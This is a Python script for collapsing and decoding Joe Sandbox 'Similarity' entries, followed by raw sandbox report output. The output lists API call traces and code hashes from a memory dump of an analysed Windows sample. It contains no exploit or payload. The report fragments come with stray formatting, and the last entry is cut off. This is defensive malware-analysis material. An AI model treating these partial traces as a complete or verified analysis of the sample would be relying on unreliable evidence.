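"""Collapse Joe Sandbox 'Similarity' entries and decode the delay-load exception code.

Added example; not part of the Joe Sandbox report. SAMPLE is constructed to mirror
the report's entry layout using values visible on the page.
"""
import re
from collections import defaultdict

FACILITY_VISUALCPP = 0x6D        # facility used by VcppException() in MSVC delayhlp.cpp
ERROR_INVALID_PARAMETER = 0x57   # Win32 error 87

# Constructed sample: two delay-load thunks sharing an Instruction ID, plus one GUI helper.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
  • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
  • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• Opcode ID: ba86cdec677a4189b94c9e73108b05df5b74b101fe7537a3901bcb83ea52265b
• Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
• Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
  • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
  • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
Similarity
• Opcode ID: 87ee575212ea8a4981b0483caf15171ff4a062e66bcb27ed41c38cedc02719bb
• Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
• Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
APIs
• SetDlgItemTextW.USER32(?,?,?), ref: 00E61DFC
Similarity
• API ID: ItemText
• Opcode ID: f124e6372640b15a096ddac77e83279c8c69ec866ceae74f620ab12ffa9e5756
• Instruction ID: 6cd8c722acc3030d0896927b1cb9aac4ecbccfbc1e2e14d8280f4697159e7c57
• Instruction Fuzzy Hash: 8BC00271509240FFCB05CF58E948D1BBBB6FB95316F51D558F19496030C331D924DB62
"""

# One API reference line: optional "Part of subcall function XXXX: ", Name.MODULE, optional (args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+: )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Similarity fields we key on ("Opcode Fuzzy Hash" deliberately excluded: it duplicates Opcode ID)
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>Opcode ID|Instruction ID|Instruction Fuzzy Hash|API ID):\s*(?P<val>\S*)\s*$"
)


def parse_entries(text):
    """Split the report text at each 'APIs' header and collect API refs and Similarity fields."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "fields": {}}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["apis"].append({"name": m["name"], "module": m["module"], "args": args,
                                "ref": int(m["ref"], 16), "subcall": m["sub"] is not None})
            continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m["key"]] = m["val"]
    return entries


def delay_load_stubs(entries):
    """Entries whose own (non-subcall) API reference is the MSVC delay-load helper."""
    return [e for e in entries
            if any(a["name"] == "___delayLoadHelper2@8" and not a["subcall"] for a in e["apis"])]


def group_by_instruction_id(entries):
    """Map Instruction ID -> list of Opcode IDs; >1 entry means the same code at different addresses."""
    groups = defaultdict(list)
    for e in entries:
        iid = e["fields"].get("Instruction ID")
        if iid:
            groups[iid].append(e["fields"].get("Opcode ID"))
    return dict(groups)


def raise_exception_codes(entries):
    """Distinct first arguments (exception codes) passed to RaiseException anywhere in the entries."""
    return {int(a["args"][0], 16) for e in entries for a in e["apis"]
            if a["name"] == "RaiseException" and a["args"] and a["args"][0] != "?"}


def decode_vcpp_exception(code):
    """Decode an NTSTATUS-style code: bits 31-30 severity, 27-16 facility, 15-0 Win32 error."""
    facility = (code >> 16) & 0x0FFF
    return {"severity": code >> 30, "facility": facility, "win32_error": code & 0xFFFF,
            "is_vcpp": facility == FACILITY_VISUALCPP}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print(len(delay_load_stubs(parsed)), "delay-load stubs of", len(parsed), "entries")
    for iid, ops in group_by_instruction_id(parsed).items():
        print(iid[:12], "x", len(ops))
    for c in raise_exception_codes(parsed):
        print(hex(c), decode_vcpp_exception(c))
```

Run over a full report export, `group_by_instruction_id` shrinks the delay-load runs to one row per Instruction ID, and anything left with a unique Instruction ID and a non-DELAYIMP API reference is where manual review should start.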
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
  • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
  • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• SetEndOfFile.KERNELBASE(?,00E6D115,?,?,?,?,?,?,?), ref: 00E6E8DC
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
APIs
• CloseHandle.KERNELBASE(?,?,00000001,00E6DE10,522FB702,?,00000000,00E993B1,000000FF,?,00E6BEA6,?), ref: 00E6DE6B
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• _wcslen.LIBCMT ref: 00E69CB1
  • Part of subcall function 00E6AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E6AC2E
  • Part of subcall function 00E6AC11: GetLastError.KERNEL32 ref: 00E6AC72
  • Part of subcall function 00E6AC11: CloseHandle.KERNEL32(?), ref: 00E6AC81
  • Part of subcall function 00E62F45: _wcslen.LIBCMT ref: 00E62F50
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00E69EE1
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E69F1E
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00E6A0BF
  • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
• DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00E6A127
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A134
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A14A
• RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A18E
• DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,522FC24A,00E99937,000000FF), ref: 00E6A196
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3517300771-3508440684
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E8163A
  • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
  • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
• SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00E816BB
• EndDialog.USER32(?,00000006), ref: 00E816CE
• GetDlgItem.USER32(?,0000006C), ref: 00E816EA
• SetFocus.USER32(00000000), ref: 00E816F1
  • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
  • Part of subcall function 00E61DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00E61DFC
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00E81763
• FindFirstFileW.KERNEL32(?,?), ref: 00E81783
• FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00E81826
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00E818AD
  • Part of subcall function 00E61150: _wcslen.LIBCMT ref: 00E6115B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
• String ID: %s %s$REPLACEFILEDLG
• API String ID: 485132379-439456425
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
APIs
• VirtualQuery.KERNEL32(80000000,YM,0000001C,00E84F4E,00000000,?,?,?,?,?,?,?,00E84D59,00000004,00EB5D84,00E84FDE), ref: 00E84E25
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E84D59,00000004,00EB5D84,00E84FDE), ref: 00E84E40
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D$YM
• API String ID: 401686933-2572881589
APIs
• _strlen.LIBCMT ref: 00E6438C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E64523
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
• String ID: CMT
• API String ID: 2172594012-2756464174
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E86884
• IsDebuggerPresent.KERNEL32 ref: 00E86950
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E86970
• UnhandledExceptionFilter.KERNEL32(?), ref: 00E8697A
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 36d68e051c5a64a2af397426420ca4b28c8c0d7c304470a16907d3c5570bed95
                                                                                              • Instruction ID: ceffa110f76982b92a9d5b46f2c3f2332843ab76abcfe7da7da695b3fba012ed
                                                                                              • Opcode Fuzzy Hash: 36d68e051c5a64a2af397426420ca4b28c8c0d7c304470a16907d3c5570bed95
                                                                                              • Instruction Fuzzy Hash: 64311875D463189BDB11EFA5D989BCCBBF8AF08304F1050EAE44CAB250EB719A84CF44
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00E6952D,?,00000040,00E6931E,00000001,?,?,?,?,0000001C,00E77618,00EAE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00E69330
                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00E6952D,?,00000040,00E6931E,00000001,?,?), ref: 00E69351
                                                                                              • _wcslen.LIBCMT ref: 00E69360
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00EAE0C8,?,?,00E6952D,?,00000040,00E6931E,00000001,?,?,?,?,0000001C), ref: 00E69373
Similarity
• API ID: ErrorFormatFreeLastLocalMessage_wcslen
• String ID:
• API String ID: 991192900-0
• Opcode ID: 1659e23b3cd7bc2cec8bee4dc1bb0ccd76146f3c04b5ff7123633d1865be96e6
• Instruction ID: 83192a02ab086f9ce932b214d90e91b334d1248ed9c2220534d630b52e3c53c6
• Opcode Fuzzy Hash: 1659e23b3cd7bc2cec8bee4dc1bb0ccd76146f3c04b5ff7123633d1865be96e6
• Instruction Fuzzy Hash: 80F082B5680204FFEB05EBA1ED05EFF77ADAB85780B24905AF502B6191CA709E01D678
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00E8535E), ref: 00E8ABBC
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00E8535E), ref: 00E8ABC6
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00E8535E), ref: 00E8ABD3
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 7d8281aaa50b9acc6f8606367abca1acc7bdad182172e60631d888ce97511703
• Instruction ID: d628847299c28972ace28592474932bcecf6e3656f7b81542e597df1e2a0c340
• Opcode Fuzzy Hash: 7d8281aaa50b9acc6f8606367abca1acc7bdad182172e60631d888ce97511703
• Instruction Fuzzy Hash: EF31D4759012289BCB21EF65D988BDCBBB8BF08310F5051EAE41CA7261EB349F858F45
Strings
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: cfdcdebac96b2dc9bc8a84fde04c809fe1673c3b00a60a28ba578813cf50a053
• Instruction ID: 5b43bbecf344f96377ff2bb8a6a8c06031b3173669ef34f6c7090db72f791f12
• Opcode Fuzzy Hash: cfdcdebac96b2dc9bc8a84fde04c809fe1673c3b00a60a28ba578813cf50a053
• Instruction Fuzzy Hash: C531F2729002097FDF249E79CC84EEB7BADDB85318F1411ADFA18A7251E6319D45CB50
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
• Instruction ID: c183c44feed36fc38137a61e0dfab1327439b36b46cc3dfb5a692d84f2891bed
• Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
• Instruction Fuzzy Hash: A1023DB1E002199BDF14CFA9D880AADB7F1EF89314F25526AD919F7385D730AD42CB90
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E7FD6A
• GetNumberFormatW.KERNEL32(00000400,00000000,?,00EA9714,?,?), ref: 00E7FDB3
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
• Opcode ID: 852d9ed98e5d9ba2169e5f432855a7eee17e8fe7875e38233ac9a75a08c917ed
• Instruction ID: 8f5bfc68206c35cd74798081eb63e0f3e1c8dd011fdd867f9b9f3e1c547f0249
• Opcode Fuzzy Hash: 852d9ed98e5d9ba2169e5f432855a7eee17e8fe7875e38233ac9a75a08c917ed
• Instruction Fuzzy Hash: C8113C75221348AFDB10EF65DC41BEB77F8EF48704F10546AF505B7161D670A908C768
Strings
Similarity
• API ID:
• String ID: CMT
• API String ID: 0-2756464174
• Opcode ID: a35986242c71f3e7d92df37155a37372466f218006e51cca83dcb1b70667ace3
• Instruction ID: 05a4dcca13baa76ecf7cbc58100c2b86da9c80a5f87f5403f67ec4327f5d2824
• Opcode Fuzzy Hash: a35986242c71f3e7d92df37155a37372466f218006e51cca83dcb1b70667ace3
• Instruction Fuzzy Hash: 8E62E3B2A406499FDF08DF74D891BDD7BE4BF15344F08A029EC09AB286DB309944CBA1
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E986CD,?,?,00000008,?,?,00E9836D,00000000), ref: 00E988FF
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: e0b2b52f6f0d6925bde860243ff7f4d116e7568a38c6937268224c91fa136855
• Instruction ID: 61e3bf72203031dcedf597563cbbf1c24c8eaa7d816b5a862c7466c473193294
• Opcode Fuzzy Hash: e0b2b52f6f0d6925bde860243ff7f4d116e7568a38c6937268224c91fa136855
• Instruction Fuzzy Hash: 38B18D31510608DFDB18CF28C58ABA47BE0FF46368F659659E89ADF2B1C735D982CB40
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E866AA
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: d319dc649a79c7980279df3e10fe75a9efca85d78a51d26b844e932e579312a8
• Instruction ID: 2d12fc4ca4f8dd85e39a368780d79c5ad685e1783e1cd7e039600c24c5508a86
• Opcode Fuzzy Hash: d319dc649a79c7980279df3e10fe75a9efca85d78a51d26b844e932e579312a8
• Instruction Fuzzy Hash: 5351A072911205CFDF18CF9AE8857AABBF0FB48318F24856AE40DFB251D3759944CB50
APIs
• GetVersionExW.KERNEL32(?), ref: 00E703ED
  • Part of subcall function 00E70469: __EH_prolog3.LIBCMT ref: 00E70470
Similarity
• API ID: H_prolog3Version
• String ID:
• API String ID: 2775145068-0
• Opcode ID: d67669d411da673e3a82819a2beecc16404aabe516aadcc51dff5f9b0f0739b1
• Instruction ID: 674d27302765b315ced84daa6671a8d354d0986074bc588caa28a97c4559b17a
• Opcode Fuzzy Hash: d67669d411da673e3a82819a2beecc16404aabe516aadcc51dff5f9b0f0739b1
• Instruction Fuzzy Hash: D2F0A43040424CCEEB24DF71AC457DC7BB05B16308F00A469D62E37352E7B8558D8B11
Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: ba9da8e48649a1a6165d5c58c9edd9ee873b1ea9c9f5ab92aa2f799c65be4ce1
                                                                                              • Instruction ID: b0ae5b4f4dac756998436ddbb895df30f6a83f58e0751b31b3aab39f894a4b66
                                                                                              • Opcode Fuzzy Hash: ba9da8e48649a1a6165d5c58c9edd9ee873b1ea9c9f5ab92aa2f799c65be4ce1
                                                                                              • Instruction Fuzzy Hash: B9D13AB2A083458FC354CF69D84065AFBE2BFC9308F55492EE998D7301D734A959CF82
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00E86445), ref: 00E86A10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: a2eb45a1a3a5da2e43969601f0092d7f5bd42b2e30a5f2849df8955123b7fb19
                                                                                              • Instruction ID: 0728e9d5dc5c371b577eaef3434c85ce121f82af6f82980306e32d8d0a5c04b4
                                                                                              • Opcode Fuzzy Hash: a2eb45a1a3a5da2e43969601f0092d7f5bd42b2e30a5f2849df8955123b7fb19
                                                                                              • Instruction Fuzzy Hash:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: da417a43beebdc9cc215fe7bcc9c7b8f706b384af139919ef6de1d4b9e1f40ae
                                                                                              • Instruction ID: dd5acd53dd3fe9dcc731624e0b696e3348a278627e154fb21a0df7f3452afafc
                                                                                              • Opcode Fuzzy Hash: da417a43beebdc9cc215fe7bcc9c7b8f706b384af139919ef6de1d4b9e1f40ae
                                                                                              • Instruction Fuzzy Hash: 9DA011302022008FAB008F33AA0820A3AA8EB002803A8802BA00AEA030EA2880088A00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                              • Instruction ID: 8ea915e295da257e1151ac25d3570b9bee5f8c2db0a54a7a34f41287edda3ea3
                                                                                              • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                              • Instruction Fuzzy Hash: 3982E3316047859FCB29CF28C8907BABBE1AF95308F18D96DD89F9B346D730A945CB11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ff048dea72ce26be74f433d34b34b2171fb7867c41190fb673386bb6e870cf7
                                                                                              • Instruction ID: 767a1f6957027361aa738840fa43673158a1e34b8de6c4aae53deda9e59eb403
                                                                                              • Opcode Fuzzy Hash: 1ff048dea72ce26be74f433d34b34b2171fb7867c41190fb673386bb6e870cf7
                                                                                              • Instruction Fuzzy Hash: 16823C65D39F895EE3039A3584021E7F3A86EFB1C9F46E71FF8A431426E721A6C75201
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                              • Instruction ID: b0ee039022a2897167d502ef9515a46b72c07423960b5237946b436a5e8ca3f5
                                                                                              • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                              • Instruction Fuzzy Hash: 407226716043858FCB19CF68C8906A9BBE6FF85304F28D5ADE89E9B346D730E945CB11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                              • Instruction ID: ed22bf2ef631fc1d06e9eb352007e58e1d84d89a45362a9580e42fa077939c98
                                                                                              • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                              • Instruction Fuzzy Hash: 20524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0c50b77e30e2a97e0966af0353011d2dc1e3decdb9be7aa0ca50f8364285d15
                                                                                              • Instruction ID: cd0c8e9324f1d705dd950399df7446c3323995c1d67cc02961f8745681cfe385
                                                                                              • Opcode Fuzzy Hash: c0c50b77e30e2a97e0966af0353011d2dc1e3decdb9be7aa0ca50f8364285d15
                                                                                              • Instruction Fuzzy Hash: 0E12D1706047068FD728CF28D891BB9B7E0FB48308F24993EE59AD7281E774A995CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
